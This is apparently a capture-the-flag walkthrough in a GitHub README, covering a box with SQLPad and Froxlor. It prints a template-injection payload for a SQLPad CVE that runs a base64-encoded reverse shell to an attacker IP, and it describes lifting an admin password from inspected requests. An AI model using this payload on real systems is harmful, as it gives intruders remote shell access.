Skip to content

Latest commit

 

History

History
66 lines (33 loc) · 2.62 KB

README.md

File metadata and controls

66 lines (33 loc) · 2.62 KB

If you scan with gobuster vhost, you will not get any results, but if you navigate through the website, you will see a button that wants to redirect you directly to a subdomain.

SQLPad CVE

{{ process.mainModule.require(‘child_process’).exec(‘echo -n
c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTAzLzQ0NDQgMD4mMQ== | base64 -d | bash’) }}

We are root users, yes, but we are inside the Docker container. At first you may think that you need to do a Docker Breakout. It definitely is, but you should think as simple as possible.

Docker Breakout (!)

Lateral Movement

We accessed the Froxlor service at 127.0.0.0.1:8080 from our local address, but we do not have a username and password to log in.

Then, when you examine the requests sent by pressing the Inspect button, you will have the password for the admin user.